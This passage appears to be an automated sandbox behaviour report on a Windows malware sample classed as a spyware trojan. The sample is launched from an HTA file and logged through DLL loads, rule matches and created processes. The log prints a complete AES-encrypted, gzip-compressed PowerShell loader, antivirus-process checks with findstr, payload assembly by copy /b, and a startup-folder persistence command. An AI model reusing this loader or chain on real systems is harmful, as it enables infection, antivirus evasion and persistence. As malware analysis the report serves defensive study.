Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll

Source: amsi32_4408.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4820, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4408, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winHTA@49/50@11/10

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A7B300 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

8_2_00A7B300

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A75200 _wtol,SHGetSpecialFolderPathW,_DebugHeapAllocator,_wtol,_DebugHeapAllocator,CoCreateInstance,

8_2_00A75200

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A79FC0 memcpy,SystemParametersInfoW,GetDC,GetDeviceCaps,MulDiv,ReleaseDC,GetModuleHandleW,FindResourceA,LoadResource,LockResource,DialogBoxIndirectParamW,

8_2_00A79FC0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypevna2a.nq5.ps1

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\setup.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ \| powershell -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1952,i,13972747378656180607,2639153371829192782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe"
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 30253
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 30253\m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif 30253\Identification.pif 30253\m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ \| powershell -	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1952,i,13972747378656180607,2639153371829192782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 30253	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 30253\m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif 30253\Identification.pif 30253\m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit

Source: C:\Windows\SysWOW64\mshta.exe

